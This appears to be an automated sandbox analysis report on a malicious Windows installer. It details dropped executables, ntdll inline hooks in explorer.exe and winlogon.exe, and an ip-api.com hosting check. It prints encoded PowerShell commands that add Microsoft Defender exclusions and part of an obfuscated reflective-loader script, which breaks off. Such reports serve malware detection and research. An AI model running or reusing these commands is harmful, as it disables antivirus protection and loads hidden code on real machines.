                          SHA-512:308CE10E6858A1BF1CDB67356CA719E5E9EB735B2D6DA85AB32F903F35C125BA7166FC5951C13EC05EA859BBD0234901CE3A99683AB2A7A3ECA6AA51FE128755
                          Malicious:false
                          Reputation:unknown
                          Preview:....2a.!..OB.if.t...F.P.....<... .....s.................................p.o.w.e.r.s.h.e.l.l.....".f.u.n.c.t.i.o.n. .L.o.c.a.l.:.J.c.V.E.S.t.Q.t.P.h.k.P.{.P.a.r.a.m.(.[.O.u.t.p.u.t.T.y.p.e.(.[.T.y.p.e.].).].[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.0.).].[.T.y.p.e.[.].].$.j.w.j.R.g.Z.F.z.a.e.Z.B.Q.B.,.[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.1.).].[.T.y.p.e.].$.j.X.r.d.W.y.l.J.n.o.).$.J.k.E.T.j.F.s.A.c.r.F.=.[.A.p.p.D.o.m.a.i.n.].:.:.C.u.r.r.e.n.t.D.o.m.a.i.n...D.e.f.i.n.e.D.y.n.a.m.i.c.A.s.s.e.m.b.l.y.(.(.N.e.w.-.O.b.j.e.c.t. .R.e.f.l.e.c.t.i.o.n...A.s.s.e.m.b.l.y.N.a.m.e.(.'.R.e.f.l.e.c.t.e.d.D.e.l.e.g.a.t.e.'.).).,.[.R.e.f.l.e.c.t.i.o.n...E.m.i.t...A.s.s.e.m.b.l.y.B.u.i.l.d.e.r.A.c.c.e.s.s.].:.:.R.u.n.)...D.e.f.i.n.e.D.y.n.a.m.i.c.M.o.d.u.l.e.(.'.I.n.M.e.'.+.'.m.o.r.y.'.+.'.M.o.d.u.l.e.'.,.$.F.a.l.s.e.)...D.e.f.i.n.e.T.y.p.e.(.'.M.y.D.e.l.e.g.a.t.e.T.y.p.e.'.,.'.C.l.a.s.s.,.P.u.b.l.i.c.,.S.e.a.l.e.d.,.A.n.s.i.C.l.a.s.s.,.A.u.t.o.C.l.a.s.s.'.,.[.M.u.l.t.i.c.a.s.t.D.e.l.e.g.a.t.e.].).;.$.

                          C:\Windows\Temp\__PSScriptPolicyTest_0aljq3hk.ty5.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Windows\Temp\__PSScriptPolicyTest_jbeqyhc4.p5f.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Windows\Temp\__PSScriptPolicyTest_oz5sx3tu.kvs.ps1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Windows\Temp\__PSScriptPolicyTest_sxsipg5c.ym2.psm1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                          Entropy (8bit):7.9968573054623615
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Install.exe
                          File size:4713759
                          MD5:280bfd5ea1f41586ea0ef60ee44bc8db
                          SHA1:57aa866f42bccbaceed938390001148323d033c1
                          SHA256:a6ca5523fce6a4a43964319c35ecb868186465309e9226ab07c158519a5ef6f9
                          SHA512:5c2bd96fd1bf0d3c3cfbca97666c9b20a6ae2ee651ad50739d30a24339b90c9f5261c9c5ea93004c4d048d892708a22802f615f5ac8a7464dc07a614366e0bd8
                          SSDEEP:98304:keFfhFS2DkSocOZKjg/sN0GkhVT8pxlxE7SSvsaTGN:keFfhxISoJZKs/DjV0xESmeN
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

                          File Icon

                          Icon Hash:62f1d8ece6f37980

                          Static PE Info

                          General

                          Entrypoint:0x40352d
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                          Entrypoint Preview

                          Instruction
                          push ebp
                          mov ebp, esp
                          sub esp, 000003F4h
                          push ebx
                          push esi
                          push edi
                          push 00000020h
                          pop edi
                          xor ebx, ebx
                          push 00008001h
                          mov dword ptr [ebp-14h], ebx
                          mov dword ptr [ebp-04h], 0040A2E0h
                          mov dword ptr [ebp-10h], ebx
                          call dword ptr [004080CCh]
                          mov esi, dword ptr [004080D0h]
                          lea eax, dword ptr [ebp-00000140h]
                          push eax
                          mov dword ptr [ebp-0000012Ch], ebx
                          mov dword ptr [ebp-2Ch], ebx
                          mov dword ptr [ebp-28h], ebx
                          mov dword ptr [ebp-00000140h], 0000011Ch
                          call esi
                          test eax, eax
                          jne 00007FAAFC52011Ah
                          lea eax, dword ptr [ebp-00000140h]
                          mov dword ptr [ebp-00000140h], 00000114h
                          push eax
                          call esi
                          mov ax, word ptr [ebp-0000012Ch]
                          mov ecx, dword ptr [ebp-00000112h]
                          sub ax, 00000053h
                          add ecx, FFFFFFD0h
                          neg ax
                          sbb eax, eax
                          mov byte ptr [ebp-26h], 00000004h
                          not eax
                          and eax, ecx
                          mov word ptr [ebp-2Ch], ax
                          cmp dword ptr [ebp-0000013Ch], 0Ah
                          jnc 00007FAAFC5200EAh
                          and word ptr [ebp-00000132h], 0000h
                          mov eax, dword ptr [ebp-00000134h]
                          movzx ecx, byte ptr [ebp-00000138h]
                          mov dword ptr [00434FB8h], eax
                          xor eax, eax
                          mov ah, byte ptr [ebp-0000013Ch]
                          movzx eax, ax
                          or eax, ecx
                          xor ecx, ecx
                          mov ch, byte ptr [ebp-2Ch]
                          movzx ecx, cx
                          shl eax, 10h
                          or eax, ecx

                          Rich Headers

                          Programming Language:
                          • [EXP] VC++ 6.0 SP5 build 8804

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x42a8.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .ndata0x360000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc0x460000x42a80x4400False0.294404871324data4.14140312698IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountry
                          RT_ICON0x461f00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x487980x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x498400x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_DIALOG0x49ca80x100dataEnglishUnited States
                          RT_DIALOG0x49da80x11cdataEnglishUnited States
                          RT_DIALOG0x49ec80x60dataEnglishUnited States
                          RT_GROUP_ICON0x49f280x30dataEnglishUnited States
                          RT_MANIFEST0x49f580x349XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                          Imports

                          DLLImport
                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Mar 27, 2022 01:40:58.721342087 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:40:58.752830029 CET8049735208.95.112.1192.168.2.4
                          Mar 27, 2022 01:40:58.752959013 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:40:58.753820896 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:40:58.785864115 CET8049735208.95.112.1192.168.2.4
                          Mar 27, 2022 01:40:58.916342020 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:42:02.109366894 CET8049735208.95.112.1192.168.2.4
                          Mar 27, 2022 01:42:02.109472036 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:42:24.943854094 CET8049735208.95.112.1192.168.2.4

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Mar 27, 2022 01:40:58.679579973 CET6064753192.168.2.48.8.8.8
                          Mar 27, 2022 01:40:58.696609020 CET53606478.8.8.8192.168.2.4

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Mar 27, 2022 01:40:58.679579973 CET192.168.2.48.8.8.80xec82Standard query (0)ip-api.comA (IP address)IN (0x0001)

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Mar 27, 2022 01:40:58.696609020 CET8.8.8.8192.168.2.40xec82No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)

                          HTTP Request Dependency Graph

                          • ip-api.com

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.449735208.95.112.180C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          TimestampkBytes transferredDirectionData
                          Mar 27, 2022 01:40:58.753820896 CET827OUTGET /line/?fields=hosting HTTP/1.1
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Mar 27, 2022 01:40:58.785864115 CET827INHTTP/1.1 200 OK
                          Date: Sun, 27 Mar 2022 00:40:57 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 5
                          Access-Control-Allow-Origin: *
                          X-Ttl: 60
                          X-Rl: 44
                          Data Raw: 74 72 75 65 0a
                          Data Ascii: true


                          Code Manipulations

                          User Modules

                          Hook Summary

                          Function NameHook TypeActive in Processes
                          ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                          NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                          ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                          NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                          ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                          NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                          NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                          ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                          ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                          NtResumeThreadINLINEexplorer.exe, winlogon.exe
                          RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                          NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                          NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                          ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                          ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                          Processes

                          Process: explorer.exe, Module: ntdll.dll
                          Function NameHook TypeNew Data
                          ZwEnumerateKeyINLINE0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQuerySystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                          ZwResumeThreadINLINE0xE9 0x91 0x13 0x35 0x58 0x8F
                          NtDeviceIoControlFileINLINE0xE9 0x97 0x73 0x36 0x64 0x4F
                          ZwDeviceIoControlFileINLINE0xE9 0x97 0x73 0x36 0x64 0x4F
                          NtEnumerateKeyINLINE0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQueryDirectoryFileINLINE0xE9 0x91 0x13 0x35 0x5C 0xCF
                          ZwEnumerateValueKeyINLINE0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQuerySystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtResumeThreadINLINE0xE9 0x91 0x13 0x35 0x58 0x8F
                          RtlGetNativeSystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtQueryDirectoryFileExINLINE0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          NtEnumerateValueKeyINLINE0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQueryDirectoryFileExINLINE0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          ZwQueryDirectoryFileINLINE0xE9 0x91 0x13 0x35 0x5C 0xCF
                          Process: winlogon.exe, Module: ntdll.dll
                          Function NameHook TypeNew Data
                          ZwEnumerateKeyINLINE0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQuerySystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                          ZwResumeThreadINLINE0xE9 0x91 0x13 0x35 0x58 0x8F
                          NtDeviceIoControlFileINLINE0xE9 0x97 0x73 0x36 0x64 0x4F
                          ZwDeviceIoControlFileINLINE0xE9 0x97 0x73 0x36 0x64 0x4F
                          NtEnumerateKeyINLINE0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQueryDirectoryFileINLINE0xE9 0x91 0x13 0x35 0x5C 0xCF
                          ZwEnumerateValueKeyINLINE0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQuerySystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtResumeThreadINLINE0xE9 0x91 0x13 0x35 0x58 0x8F
                          RtlGetNativeSystemInformationINLINE0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtQueryDirectoryFileExINLINE0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          NtEnumerateValueKeyINLINE0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQueryDirectoryFileExINLINE0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          ZwQueryDirectoryFileINLINE0xE9 0x91 0x13 0x35 0x5C 0xCF

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:1
                          Start time:01:40:46
                          Start date:27/03/2022
                          Path:C:\Users\user\Desktop\Install.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Install.exe"
                          Imagebase:0x400000
                          File size:4713759 bytes
                          MD5 hash:280BFD5EA1F41586EA0EF60EE44BC8DB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          General

                          Target ID:2
                          Start time:01:40:47
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
                          Imagebase:0x400000
                          File size:5028144 bytes
                          MD5 hash:D55DC38B4EE6BED2168E74194533C572
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 50%, Virustotal, Browse
                          Reputation:low

                          General

                          Target ID:3
                          Start time:01:40:48
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:4
                          Start time:01:40:48
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\34432.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\34432.exe
                          Imagebase:0x770000
                          File size:2366976 bytes
                          MD5 hash:04F6704BD3AB97905A497BAF3D7FDB3C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\34432.exe, Author: Arnim Rupp
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 35%, Virustotal, Browse
                          • Detection: 77%, ReversingLabs
                          Reputation:low

                          General

                          Target ID:5
                          Start time:01:40:49
                          Start date:27/03/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Imagebase:0xbe0000
                          File size:98912 bytes
                          MD5 hash:6807F903AC06FF7E1670181378690B22
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Target ID:6
                          Start time:01:40:58
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:7
                          Start time:01:40:59
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:8
                          Start time:01:40:59
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Target ID:20
                          Start time:01:41:27
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          General

                          Target ID:22
                          Start time:01:41:36
                          Start date:27/03/2022
                          Path:C:\Windows\System32\nslookup.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\nslookup.exe
                          Imagebase:0x7ff6e2e30000
                          File size:86528 bytes
                          MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Target ID:23
                          Start time:01:41:41
                          Start date:27/03/2022
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg 